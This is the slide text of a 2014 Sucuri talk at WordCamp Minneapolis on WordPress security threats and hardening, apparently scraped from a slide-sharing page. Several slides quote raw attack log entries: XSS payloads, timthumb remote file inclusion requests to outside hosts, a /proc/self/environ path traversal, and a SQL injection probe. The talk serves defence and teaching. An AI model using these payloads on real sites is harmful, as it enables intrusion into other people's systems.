WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security

50 %
50 %
Information about WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
Presentations & Public Speaking

Published on April 26, 2014

Author: perezbox

Source: slideshare.net

Website Security (WordPress)

 Organization  Sucuri, Inc.  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Special Interests:  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security4/26/2014 2

 Website Security Company  Global Operations  PlatformAgnostic (i.e.,WordPress,Jjoomla, etc..)  Scan 3M Unique Domains a Month  Perform +50M scans a month  Block 30M + website attacks a month  Remediate 400 – 500 websites a day  +30k Clients / +250k Unique Domains  24/7 global operations 4/26/2014 Tony Perez | @perezbox | @sucuri_security 3

 Trends  Threats  Defenses 4/26/2014 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?

Tony Perez | @perezbox | @sucuri_security4/26/2014 5

4/26/2014 Tony Perez | @perezbox | @sucuri_security 6 Data Breaches (Millions) 2011 2013

MaliciousWebsites LegitimateWebsites 4/26/2014 Tony Perez | @perezbox | @sucuri_security 7

Not-Exploitable Exploitable 4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8 1 in 8 - CriticalVulnerability

26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 4/26/2014 Tony Perez | @perezbox | @sucuri_security 10

4/26/2014 Tony Perez | @perezbox | @sucuri_security 11

4/26/2014 Tony Perez | @perezbox | @sucuri_security 12

4/26/2014 Tony Perez | @perezbox | @sucuri_security 13 Darkleech Cdork (Apache) Ebury (SSH) Email Server (SPAM)  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a highly adaptive / sophistication Heartbleed (OpenSSL)

4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 14

 Pharmacy  Payday Loans 4/26/2014 Tony Perez | @perezbox | @sucuri_security 16

4/26/2014 Tony Perez | @perezbox | @sucuri_security 17  ExploitingAccess Control

4/26/2014 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4 Cross-Site Contamination

4/26/2014 Tony Perez | @perezbox | @sucuri_security 19

4/26/2014 Tony Perez | @perezbox | @sucuri_security 20

4/26/2014 Tony Perez | @perezbox | @sucuri_security 21

4/26/2014 Tony Perez | @perezbox | @sucuri_security 22

4/26/2014 Tony Perez | @perezbox | @sucuri_security 23

4/26/2014 Tony Perez | @perezbox | @sucuri_security 24

4/26/2014 Tony Perez | @perezbox | @sucuri_security 25

4/26/2014 Tony Perez | @perezbox | @sucuri_security 26

 Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole ExploitAuthor Arrested 4/26/2014 Tony Perez | @perezbox | @sucuri_security 27

25% 22% 9% 1% 11% 5% 12% 10% 5%0% Neutrino Unknown Kit Redkit SweetOrange Styx Glazunov/Sibhost Nuclear Blackhole/Cool Other 4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 28

4/26/2014 Tony Perez | @perezbox | @sucuri_security 29

4/26/2014 Tony Perez | @perezbox | @sucuri_security 30

4/26/2014 Tony Perez | @perezbox | @sucuri_security 31  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?

4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 32

4/26/2014 Tony Perez | @perezbox | @sucuri_security 33 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective

4/26/2014 Tony Perez | @perezbox | @sucuri_security 34

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4/26/2014 Tony Perez | @perezbox | @sucuri_security 35

4/26/2014 Tony Perez | @perezbox | @sucuri_security 36 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”

4/26/2014 Tony Perez | @perezbox | @sucuri_security 37

4/26/2014 Tony Perez | @perezbox | @sucuri_security 38

 http://blog.sucuri.net/2014/03/unmasking-free-premium- wordpress-plugins.html 4/26/2014 Tony Perez | @perezbox | @sucuri_security 39 - SEOPresser - Payload located: wp-content/plugins/seo-pressor(gratuit) - File: central.class.php - Flat Skins Pack Extension - Payload located: wp-content/restrict-content-pro/includes/ - File: sidebar.php - Restrict Content Pro - Paylaod located: wp-content/ubermenu-skins-flat

 Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 4/26/2014 Tony Perez | @perezbox | @sucuri_security 40

4/26/2014 Tony Perez | @perezbox | @sucuri_security 41

 Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 4/26/2014 Tony Perez | @perezbox | @sucuri_security 42

 Principles  Access Control  Vulnerabilities 4/26/2014 Tony Perez | @perezbox | @sucuri_security 43

“It’s about risk reduction… risk will never be zero…” 4/26/2014 Tony Perez | @perezbox | @sucuri_security 44

“…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 4/26/2014 Tony Perez | @perezbox | @sucuri_security 45

 Passwords 4/26/2014 Tony Perez | @perezbox | @sucuri_security 46 Complex – Long - Unique

“requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 4/26/2014 Tony Perez | @perezbox | @sucuri_security 47

4/26/2014 Tony Perez | @perezbox | @sucuri_security 48  PHP Execution, disable it:  /wp-includes  /wp-content  /themes  /plugins  /uploads <Files *.php> Deny from all </Files>

 WP-CONFIG File Modification #Disable Plugin /Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 49

4/26/2014 Tony Perez | @perezbox | @sucuri_security 50

4/26/2014 Tony Perez | @perezbox | @sucuri_security 51 NOTTHAT HARD!!!!

4/26/2014 Tony Perez | @perezbox | @sucuri_security 52

4/26/2014 Tony Perez | @perezbox | @sucuri_security 53

4/26/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 54 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP / Multi- Factor Authentication 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers Ideal implementations: 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database The Bare Minimum:

1. Fix index.php file and assume all is fine. 1. Panic your way into WordPress Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 4/26/2014 Tony Perez | @perezbox | @sucuri_security 55

4/26/2014 Tony Perez | @perezbox | @sucuri_security 56 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress

4/26/2014 Tony Perez | @perezbox | @sucuri_security 57 Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security

#joomladayatlanta presentations

Add a comment

Related presentations

• Presentación realizada por Verónica Lango Reynoso (candidata a PhD. en Ciencias ...

The Crisis of Journalism Reconsidered: Cultural Power Barcelona, Spain | May 1-3...

We often hear that a presentation needs a good story. But the tricky part is ...

Ecomondo 2014

Ecomondo 2014

November 10, 2014

La marcatura CE degli aggregati prodotti in un impianto di soil washing: i control...

Hermosillo, Sonora.- Para fortalecer la industria engordadora y que la producción ...

Related pages

WordCamp Minneapolis 2014: The Basics Of WordPress ...

WordCamp Minneapolis 2014: ... In this presentation, I share insights into security threats and ... A globally recognized website security company ...
Read more

Tony Perez: WordPress Security – It’s All About The Basics ...

The key to website security is awareness. ... Presentation Slides ... How To; Get Involved; Blog; Home » WordCampTV » WordCamp Minneapolis 2014. Tony ...
Read more

Security Blunders Presentation UK 2014 - Education

NACCTFO Cyber Security Presentation 2014 New Orleans. ... WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security.
Read more

Blogging Like A Rockstar - 2014 WordCamp Presentation ...

WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security eLearning Rockstar Presentation WordCamp Miami 2012: Blogging Basics
Read more

Speakers | WordCamp Miami 2016

... the leading provider of website security ... for Sucuri, a website security ... since 2014 and got her start speaking at WordCamp ...
Read more

WordCamp Minneapolis 2015: Building and Running a Global ...

Recently I spoke at WordCamp Minneapolis 2015 on ... WordCamp Minneapolis 2015: Building and ... A globally recognized website security company ...
Read more

David Bisset | WordCamp Miami 2016 | Page 2

WordCamp Miami is happy to announce the fourth wave of approved and confirmed speakers for WordCamp ... since 2014 and got her start speaking at WordCamp ...
Read more

Website Security | LinkedIn

Website Security. There are many occupations that fall under the security label. In addition to security guards who provide physical security to people or ...
Read more